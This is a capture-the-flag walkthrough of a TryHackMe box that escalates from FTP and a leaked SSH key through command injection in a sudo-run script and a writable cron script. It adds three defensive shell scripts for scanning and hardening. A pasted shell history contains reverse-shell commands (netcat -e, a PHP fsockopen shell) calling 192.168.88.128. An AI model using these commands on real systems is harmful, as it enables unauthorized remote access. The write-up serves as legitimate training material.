```
# Nmap 7.91 scan initiated Tue May 11 15:15:28 2021 as: nmap -sSVC -p- -oA nmap_full -v 10.10.103.106
Nmap scan report for 10.10.103.106
Host is up (0.027s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 79:5f:11:6a:85:c2:08:24:30:6c:d4:88:74:1b:79:4d (RSA)
|   256 af:7e:3f:7e:b4:86:58:83:f1:f6:a2:54:a6:9b:ba:ad (ECDSA)
|_  256 26:25:b0:7b:dc:3f:b2:94:37:12:5d:cd:06:98:c7:9f (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May 11 15:18:09 2021 -- 1 IP address (1 host up) scanned in 161.56 seconds
```
So I found nothing. The thing is that I always use the room's ID as the local
domain for TryHackMe (e.g. here teamcw.thm), but it seems the only configured
vhost that answers is team.thm; there is no fallback to anything else.
```
$ grep team /etc/hosts
10.10.114.89 teamcw.thm team.thm
```
There is a file http://team.thm/scripts/script.txt containing a backup of a bash
script. In a real web app /scripts/ only contains .js files, so you wouldn't
normally enumerate for .txt here, and since when would anyone store a bash
script there? Plus, the file should be named ftp.sh or ftp-backup.sh, not
script.txt. We can shame the author dalemazza for this scenario.
```bash
#!/bin/bash
read -p "Enter Username: " REDACTED
read -sp "Enter Username Password: " REDACTED
echo
ftp_server="localhost"
ftp_username="$Username"
ftp_password="$Password"
mkdir /home/username/linux/source_folder
source_folder="/home/username/source_folder/"
cp -avr config* $source_folder
dest_folder="/home/username/linux/dest_folder/"
ftp -in$ftp_server <<END_SCRIPT
quote USER $ftp_username
quote PASS $decrypt
cd $source_folder
!cd $dest_folder
mget -R *
quit
# Updated version of the script
# Note to self had to change the extension of the old "script" in this folder, as it has creds in
```
lol, this dummy comment at the end is trying to justify this broken scenario.
My bad, it's not even that: it's a hint telling you to find a backup file of this
script (with a different extension) containing an unedited version with the
credentials.
```
$ ftp team.thm
Connected to teamcw.thm.
220 (vsFTPd 3.0.3)
Name (team.thm:noraj): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxr-x    2 65534    65534        4096 Jan 15 21:25 workshare
226 Directory send OK.
ftp> ls workshare
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rwxr-xr-x    1 1002     1002          269 Jan 15 21:24 New_site.txt
226 Directory send OK.
ftp> cd workshare
250 Directory successfully changed.
ftp> get New_site.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for New_site.txt (269 bytes).
226 Transfer complete.
269 bytes received in 4,7e-05 seconds (5,46 Mbytes/s)
```
New_site.txt:

```
Dale

I have started coding a new website in PHP for the team to use, this is currently under development. It can be found at ".dev" within our domain.

Also as per the team policy please make a copy of your "id_rsa" and place this in the relevant config file.

Gyles
```
I guess he made a mistake and meant a dev. sub-domain rather than .dev
in the domain.
The nonsense continues: in the SSH server config /etc/ssh/sshd_config we can
find dale's SSH private key in a comment. This is totally not how the SSH server
config works. The author dalemazza didn't have the skills to find out how it
works, so he just decided to dump the key in a comment. How unrealistic. Plus, to
write to /etc/ssh/sshd_config you must have root permission, so we'll see in the
next steps: if dale is not a sudoer, the scenario would be even more broken.
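The lesson for a defender here is that secrets end up in places nobody audits, and sshd happily ignores a commented-out key block while an attacker reading the file does not. Below is an added example (my own, not part of this writeup or of the room) of a small secret-scan for private-key material in configuration files. The directory tree it scans is constructed in a temp directory and the key header is a placeholder, not a real key.

```shell
#!/bin/sh
# Added example, not part of the writeup: a small secret-scan for private-key
# material left in configuration files, the way dale's key sat in a comment in
# /etc/ssh/sshd_config on this box. The directory layout and the sample lines
# below are constructed for the demo; the key header is a placeholder, not a key.

# find_key_files DIR: list regular files under DIR containing a PEM private-key
# header. Commented-out lines match too: sshd ignores a '#' line, a reader does not.
find_key_files() {
  find "$1" -type f -exec grep -l -E -- '-----BEGIN( [A-Z]+)* PRIVATE KEY-----' {} + 2>/dev/null
}

# count_key_files DIR: number of files flagged by find_key_files (0 if none).
count_key_files() {
  find_key_files "$1" | grep -c .
}

# build_demo_tree: create a constructed /etc-like tree and print its path.
build_demo_tree() {
  d=$(mktemp -d)
  mkdir -p "$d/ssh"
  # sshd_config with a commented-out key block (placeholder text, constructed)
  {
    printf 'Port 22\n'
    printf 'PermitRootLogin no\n'
    printf '# -----BEGIN OPENSSH PRIVATE KEY-----\n'
    printf '# PLACEHOLDER-NOT-A-REAL-KEY\n'
    printf '# -----END OPENSSH PRIVATE KEY-----\n'
  } > "$d/ssh/sshd_config"
  # ssh_config that only references a key path, which is fine
  printf 'Host *\n  IdentityFile ~/.ssh/id_rsa\n' > "$d/ssh/ssh_config"
  printf '127.0.0.1 localhost\n' > "$d/hosts"
  printf '%s\n' "$d"
}

if [ "${1-}" = "--demo" ]; then
  tree=$(build_demo_tree)
  printf 'files with private-key material under %s:\n' "$tree"
  find_key_files "$tree"
  printf 'count: %s\n' "$(count_key_files "$tree")"
fi
```

Run it with `--demo` to see the constructed tree scanned; pointing `find_key_files` at a real `/etc` is the same call with a different argument. The pattern deliberately matches the header regardless of leading `#`, because a key is just as usable from a comment.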
```
$ ssh dale@team.thm -i id_rsa_dale
Last login: Mon Jan 18 10:51:32 2021
dale@TEAM:~$ id
uid=1000(dale) gid=1000(dale) groups=1000(dale),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),113(lpadmin),114(sambashare),1003(editors)
dale@TEAM:~$ sudo -l
Matching Defaults entries for dale on TEAM:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dale may run the following commands on TEAM:
    (gyles) NOPASSWD: /home/gyles/admin_checks
```
What did I tell you? dale is a sudoer but can only run the /home/gyles/admin_checks
command as gyles, so he couldn't have edited /etc/ssh/sshd_config as root.
I fear this nonsense never ends.
Before trying to EoP let's dump the flag.
```
dale@TEAM:~$ cat user.txt
THM{edited}
```
lol, .bash_history has not been blocked, so we can find the next steps and
learn how to EoP by seeing how the author prepared the box and tested it.
```
id uname -a exit clear exyt exit ls -la chmod 700 .ssh cd .ssh ls -la chmod 600 authorized_keys sudo chmod 600 authorized_keys ls -l0a ls -la sudo chown authorized_keys sudo chown dale:dale authorized_keys sudo chown dale:dale id_rsa ls -la chmod 644 id_rsa ls -la netstat -tulpn systemctl start vsftpd netstat -tulpn sudo systemctl start vsftpd netstat -tulpn sudo ufw sudo ufw app list sudo ufw allow `vsftpd` sudo ufw allow 'vsftpd' sudo ufw allow 'vsftpd.service' sudo ufw allow vsftpd sudo ufw allow 21 sudo ufw netstat -tulpn sudo netstat -tulpn sudo apt install vsftpd sudo systemctl enable vsftpd netstat -tulpn sudo systemctl start vsftpd netstat -tulpn ftp localhost cat /etc/vsftpd.conf less /etc/vsftpd.conf sudo systemctl status vsftpd ls /etc/
ls /etc/ | grep vsftpd] ls /etc/ | grep vsftpd ls -la /etc/ | grep vsftpd less /etc/vsftpd.conf sudo nano /etc/vsftpd.conf sudo systemctl status vsftpd sudo systemctl restart vsftpd sudo systemctl status vsftpd sudo chown nobody:nogroup /home/ftpuser cd /home ls -la cd ftpuser/ ls ls -la sudo chown nobody:nogroup workshare/ ls -la sudo nano /etc/vsftpd.conf clear# clear ls ls -la sudo -l su root cd ls -la nano user.txt cat user.txt clear ls -la reboot sudo -l exity exit id ls sudo -l sudo -u gyles /home/gyles/admin_checks clear cd /var/stats/ ls ls -la sudo chmod 666 stats.txt ls -la sudo chown dale:editors stats.txt ls -la cd sudo -u gyles /home/gyles/admin_checks ls -la /var/stats/ rm /var/stats/stats-2021-01-15-21-59.bak clear ls -la sudo -u gyles /home/gyles/admin_checks clear ls pwd ls -la netstat -tulpn cat user.txt su root ls wget wget http://192.168.88.128:8000/lin.sh . chmod +x lin.sh ./lin.sh sudo -u#-1 bash ls rm lin.sh ls -la sudo -l sudo -u gyles /home/gyles/admin_checks clear exit ls cd ls ls -la sudo shutdown su root ls cd /var/www ls clear ls -la less /etc/apache2/apache2.conf cd html ls nano index.html sudo nano index.html su root ls su gyles ls sudo -l sudo -u gyles /home/gyles/admin_checks ls ./php ls cd .. ls ls -ls su gyles dale id ls ls cd ls ls -la su root ls user id whoami cd cd ls cd ls su root cd ls cd cd .. ls ls -la sudo -l sudo -u gyles /home/gyles/admin_checks ls -la /bin/ | grep bash su root su root ls reboot shutdown cd /home/gyes cd /home/gyles/ ls -la su root su rrot su root sudo -l sudo -u gyles /home/gyles/admin_checks clear sudo -u gyles /home/gyles/admin_checks clear cd /var/backups/ ls cd www ls -la cd dev/ ls -ls cat /home/gyles/admin_checks cd .. cd stats/ ls -la rm stats-* ls -la shutdown
```
```
$ cat /home/gyles/admin_checks
#!/bin/bash

printf "Reading stats.\n"
sleep 1
printf "Reading stats..\n"
sleep 1
read -p "Enter name of person backing up the data: " name
echo $name >> /var/stats/stats.txt
read -p "Enter 'date' to timestamp the file: " error
printf "The Date is " $error 2>/dev/null
```
The value typed at the `error` prompt is used directly as a command, so we can inject a shell if we want.
```
dale@TEAM:~$ sudo -u gyles /home/gyles/admin_checks
Reading stats.
Reading stats..
Enter name of person backing up the data: noraj
Enter 'date' to timestamp the file: /bin/bash -i
The Date is uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
```
Then upgrade to a PTY with `python3 -c 'import pty;pty.spawn("/bin/bash")'`.
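The root cause of that EoP is a sudo-exposed script that lets untrusted input reach a command position. As an added example (my own rewrite, not the room's script and not dalemazza's code), here is the same stats-logging logic with the input handled safely: the name is validated and written with `printf '%s'`, the timestamp is produced by the script itself, and the "date" answer is compared as a string and never executed. The stats path defaults to a temp file for the demo; on the box it would be /var/stats/stats.txt.

```shell
#!/bin/sh
# Added example, not the box's script: a hardened rewrite of the admin_checks
# logic. The fix is that user input is never expanded into a command. The name
# is validated and written with printf '%s', and the timestamp is produced by
# the script itself; typing a shell path at either prompt is simply rejected.
# STATS_FILE defaults to a temp file here (assumption for the demo); on the box
# it would be /var/stats/stats.txt.

STATS_FILE=${STATS_FILE:-$(mktemp)}

# validate_name LABEL: accept 1..64 characters from [A-Za-z0-9._-] only.
validate_name() {
  case "$1" in
    ''|*[!A-Za-z0-9._-]*) return 1 ;;
  esac
  [ "${#1}" -le 64 ]
}

# validate_date_choice ANSWER: the original prompt asks the user to type 'date';
# the only accepted answer is that literal word, and it is never executed.
validate_date_choice() {
  [ "$1" = "date" ]
}

# record_backup NAME ANSWER: on valid input append "<stamp> <name>" to the stats
# file, print the stamp and return 0; on anything else print a reason to stderr
# and return 1 without touching the file.
record_backup() {
  validate_name "$1" || { printf 'rejected: name may only contain [A-Za-z0-9._-]\n' >&2; return 1; }
  validate_date_choice "$2" || { printf 'rejected: expected the word date\n' >&2; return 1; }
  stamp=$(date -u +%Y-%m-%d-%H-%M)        # computed here, never from user input
  printf '%s %s\n' "$stamp" "$1" >> "$STATS_FILE"
  printf 'The Date is %s\n' "$stamp"
}

# Interactive use, mirroring the original prompts (only runs with --interactive).
if [ "${1-}" = "--interactive" ]; then
  printf 'Enter name of person backing up the data: '; read -r name
  printf "Enter 'date' to timestamp the file: ";        read -r answer
  record_backup "$name" "$answer"
fi
```

The sudoers rule can stay exactly as narrow as it was; what matters is that the script it points to is root-owned, not writable by the caller, and contains no path where user input is evaluated. `sh script.sh --interactive` reproduces the original prompts, and answering `/bin/bash -i` now produces a rejection line instead of a shell.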
```
cd ls -la nano admin_checks scp dale@192.168.88.129:/home/gyles/admin_checks /home/gyles/admin_checks ls ls -la cat admin_checks su root ls cd ls -la scp gyles@192.168.88.129:/home/gyles/admin_checks /home/gyles/ scp root@192.168.88.129:/home/gyles/admin_checks /home/gyles/ sudo scp root@192.168.88.129:/home/gyles/admin_checks /home/gyles/ su root ls cat /etc/shells echo $SHELL chsh -s /bin/bash echo $SHELL exit ls echo $SHELL ls sudo -l cat /etc/crontab which nc nc nc 192.168.88.128 -e /bin/bash nc 192.168.88.128 < /bin/bash nc -e ps aux | grep root ls su root ls cd ls ls -la su root id cd /opt ls -la cd admin_stuff/ ls ./blog_backup.sh clear ls ls -la su root ./nc -e /bin/bash 192.168.88.128 4444 ./nc -e /bin/bash -p 192.168.88.128 4444 ./nc -e "/bin/bash -p" 192.168.88.128 4444 ls -la ./nc -e /bin/sh 192.168.88.128 4444 ls sudo install -m =xs $(netcat-tradtional) sudo install -m =xs $(which nc) ls -la reboot shutdown nc -e clear ./nc -e /bin/bash localhost sudo chown :admin nc ./nc -e /bin/bash localhost ./nc -e /bin/bash 192.168.88.128 4444 clear ls -la su root cd /opt/admin_stuff/ ls -la id clear ./nc -e /bin/bash 192.168.88.128 4444 ls -la sudo chmod g+s nc ls ls -la ./nc -e /bin/bash 192.168.88.128 4444 ls -la cat /etc/crontab php which php ls -la php -r '$sock=fsockopen("192.168.88.128",4444);exec ("/bin/sh -i <&3 >&3 2>&3");' exit id whoami pwd cd /root ls cat root.txt rm test.txt rm log.log ls -la exi exit id /bin/bash -p exit id /bin/bash exit ls ls -la cd /opt/admin_stuff/ ls -la which php sudo cp /usr/bin/php . ls -la sudo g+s php sudo chmod g+s php ls -la ./php -r '$sock=fsockopen("192.168.88.128",4444);exec ("/bin/sh -i <&3 >&3 2>&3");' ls -la sudo chown :admin php ls -la sudo chmod g+s php ls -la ./php -r '$sock=fsockopen("192.168.88.128",4444);exec ("/bin/sh -i <&3 >&3 2>&3");' ./php -r "pcntl_exec('/bin/sh', ['-p']);" sudo install -m =xs $(which php) .
ls -la ./php -r "pcntl_exec('/bin/sh', ['-p']);" sudo chmod 002 nc ls -la sudo chmod 004 nc ls -la sudo chmod 005 nc ls -la sudo chmod 001 nc ls -la sudo chown :root nc ls -la sudo chown xs nc sudo chmod xs nc sudo chmod gu+s nc ls -la ./nc -e ./nc -e 192.168.88.128 4444 ./nc -e /bin/bash 192.168.88.128 4444 sudo add-apt-repository universe apt search netcat sudo install netcat-tradtional sudo install netcat-traditional sudo apt -get install netcat-traditional sudo apt-get install netcat-traditional nc -e which nc which nc-tradtional locate nc clear locate nc | grep netcat ls -la sudo apt-get remove netcat-traditional sudo install -m =xs $(which nc) . ls -la
which nc sudo apt-get install netcat-traditional cd /usr/bin ls -la ls -la | grep net ls -la | grep nc locate nc which nc cd /bin ls -la | grep nc cd /opt/admin_stuff/ sudo install -m =xs $(/bin/nc.traditional) . sudo install -m =xs /bin/nc.traditional . ls -la ./nc.traditional -e ./nc.traditional -e /bin/bash 192.168.88.128 4444 ./nc.traditional -e /bin/sh 192.168.88.128 4444 rm nc* sudo rm n* ls ls -la su dale cd /usr/local/bin/ ls -la sudo nano main_backup.sh cd /var/backups/ sudo mkdir team.thm ls -la cd www ls cd .. ls nano /usr/local/bin/main_backup.sh sudo nano /usr/local/bin/main_backup.sh ls -la rm team.thm/ rm -r team.thm/ sudo rm -r team.thm/ ls -la cd www ls -ls cd team cd team.thm/ ls -la date ls -la sudo rm * ls ls -la ls ls ls -la cat /usr/local/bin/main_backup.sh ls /opt/admin_stuff/./script.sh ls sudo chmmod +x /usr/local/bin/main_backup.sh sudo chmod +x /usr/local/bin/main_backup.sh ls sudo /opt/admin_stuff/./script.sh ls clear sudo rm * ls ls# ls ls -la ls nano /usr/local/bin/main_backup.sh cd /var/usr cd /usr/local/ ls -la sudo chown :admin bin sudo chmod 775 bin/ ls ls -la cd bin ls -la sudo chown :admin main_backup.sh sudo chmod 775 main_backup.sh ls -la nano main_backup.sh ls ls -la id nano main_backup.sh cd home cd ls -la ls l ls cat root.txt ls rm root.txt sudo rm root.txt nano /usr/local/bin/main_backup.sh ls /bin/bash ls cd /usr/local/sbin/ cat /usr/local/bin/main_backup.sh nano dev_backup.sh sudo nano dev.backup.sh ls /var/backups/www/ nano dev_backup.sh ls nano dev.backup.sh sudo nano dev.backup.sh sudo nano /opt/admin_stuff/script.sh sudo chmod +x dev.backup.sh ls ls -la cd /var/backups/ ls -la cd www ls cd dev/ ls ls -la rm * sudo rm * ls -la ls ls -la cat /usr/local/sbin/dev.backup.sh ls ls /var/www/ sudo nano /usr/local/sbin/dev.backup.sh sudo cat /usr/local/sbin/dev.backup.sh ls ls -la cd .. ls ls -la cd dev ls cd ../team.thm/ ls cd .. ls rm main rm -r main/ sudo rm -r main/ ls ls -la cd dev ls ls -la cd ..
nano /usr/local/sbin/dev.backup.sh cat /usr/local/sbin/dev.backup.sh cat /usr/local/bin/main_backup.sh cat /opt/admin_stuff/script.sh nano /usr/local/sbin/dev.backup.sh UDO nano /usr/local/sbin/dev.backup sudo nano /usr/local/sbin/dev.backup sudo nano /usr/local/sbin/dev.backup.sh clear cd dev ls -la sudo nano /opt/admin_stuff/script.sh ls diff /usr/local/sbin/dev_backup.sh /usr/local/bin/main_backup.sh ls ls -la /usr/local/sbin/ cd /usr/local/sbin/ ls -la sudo chmod +x dev_backup.sh sudo rm dev.backup.sh ls -la cd /var/backups/www/dev/ ls cd .. ls -la cd /usr/local/ ls -la cd sbin/ ls ls -la nano dev_backup.sh ls cd ls sudo rm root.txt ls nano /usr/local/bin/main_backup.sh clear ls cd su root cronjob -l crontab -l
su root ls ls -la sudo chmod 770 admin_stuff/ ls -la cd admin_stuff/ ls -la sudo chmod 440 php ls -la sudo chmod 110 php ls -la sudo chmod gu+s php ls -la ./php sudo ./php clear ls -la ls ./php rm php ls sudo rm php ls -la cd .. ls ls -la cd admin_stuff/ su root lsa ls su dale id cd ls ls -la reboot su root su root
```
```
gyles@TEAM:~$ id
uid=1001(gyles) gid=1001(gyles) groups=1001(gyles),1003(editors),1004(admin)
```
There is a script owned by root that is believed to be executed in a cron job:
```
gyles@TEAM:~$ ls -lh /opt/admin_stuff/script.sh
-rwxr--r-- 1 root root 200 Jan 17 20:38 /opt/admin_stuff/script.sh
gyles@TEAM:~$ cat /opt/admin_stuff/script.sh
#!/bin/bash
#I have set a cronjob to run this script every minute

dev_site="/usr/local/sbin/dev_backup.sh"
main_site="/usr/local/bin/main_backup.sh"
#Back ups the sites locally
$main_site
$dev_site
```
This is a wrapper calling two other scripts.
```
gyles@TEAM:~$ ls -lh /usr/local/sbin/dev_backup.sh
-rwxr-xr-x 1 root root 64 Jan 17 19:42 /usr/local/sbin/dev_backup.sh
gyles@TEAM:~$ ls -lh /usr/local/bin/main_backup.sh
-rwxrwxr-x 1 root admin 65 Jan 17 20:36 /usr/local/bin/main_backup.sh
```
We notice that main_backup.sh is writable by the admin group, which gyles is in.
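The thing to catch on the blue side is exactly this shape: a root-owned wrapper run from cron that calls sub-scripts somebody else can edit. As an added example (my own, not code from the room or its author), the auditor below takes a wrapper like /opt/admin_stuff/script.sh, pulls out the absolute paths it assigns in `name="/path"` form, and flags any of them (or the wrapper itself) that is group- or world-writable or missing. The demo tree it builds in a temp directory mirrors the permissions shown above (main_backup.sh at 775, dev_backup.sh at 755); the paths are constructed, not the box's.

```shell
#!/bin/sh
# Added example (not from the box): audit a cron wrapper like /opt/admin_stuff/script.sh
# for sub-scripts that a non-root user could edit. The page's wrapper assigns the
# paths in shell variables (dev_site="..."; main_site="...") and then runs them,
# so the auditor extracts double-quoted absolute paths from such assignments.

# writable_by_nonowner FILE: succeed (0) if the group or "other" write bit is set,
# read from the mode string of ls -ld (portable across GNU and BSD stat variants).
writable_by_nonowner() {
  mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10) || return 1
  [ -n "$mode" ] || return 1
  gw=$(printf '%s' "$mode" | cut -c6)   # position 6: group write bit
  ow=$(printf '%s' "$mode" | cut -c9)   # position 9: other write bit
  [ "$gw" = "w" ] || [ "$ow" = "w" ]
}

# referenced_scripts WRAPPER: print absolute paths assigned as name="/abs/path".
referenced_scripts() {
  sed -n 's/^[A-Za-z_][A-Za-z0-9_]*="\(\/[^"]*\)".*/\1/p' "$1"
}

# audit_wrapper WRAPPER: print one line per checked file ("ok", "WRITABLE" or
# "MISSING"); return 1 if anything was flagged, 0 otherwise.
audit_wrapper() {
  wrapper=$1; flagged=0
  for f in "$wrapper" $(referenced_scripts "$wrapper"); do
    if [ ! -e "$f" ]; then
      printf 'MISSING %s\n' "$f"; flagged=1   # a dangling path a cron job still runs
    elif writable_by_nonowner "$f"; then
      printf 'WRITABLE %s\n' "$f"; flagged=1
    else
      printf 'ok %s\n' "$f"
    fi
  done
  return $flagged
}

# demo_setup: constructed temp tree mirroring the box's layout; prints the wrapper path.
# main_backup.sh is group-writable (775) like on the page, dev_backup.sh is 755.
demo_setup() {
  d=$(mktemp -d)
  printf '#!/bin/sh\necho main\n' > "$d/main_backup.sh"; chmod 775 "$d/main_backup.sh"
  printf '#!/bin/sh\necho dev\n'  > "$d/dev_backup.sh";  chmod 755 "$d/dev_backup.sh"
  printf '#!/bin/bash\n#I have set a cronjob to run this script every minute\ndev_site="%s"\nmain_site="%s"\n$main_site\n$dev_site\n' \
    "$d/dev_backup.sh" "$d/main_backup.sh" > "$d/script.sh"
  chmod 744 "$d/script.sh"
  printf '%s\n' "$d/script.sh"
}

if [ "${1-}" = "--demo" ]; then
  w=$(demo_setup)
  audit_wrapper "$w"
fi
```

Running it with `--demo` prints `ok` for the wrapper and dev_backup.sh and `WRITABLE` for main_backup.sh, with exit status 1. Against a real host you would feed it every script referenced from /etc/crontab, /etc/cron.d and root's crontab; the fix for the flagged file is `chmod 755` plus root ownership, not a broader sudo rule.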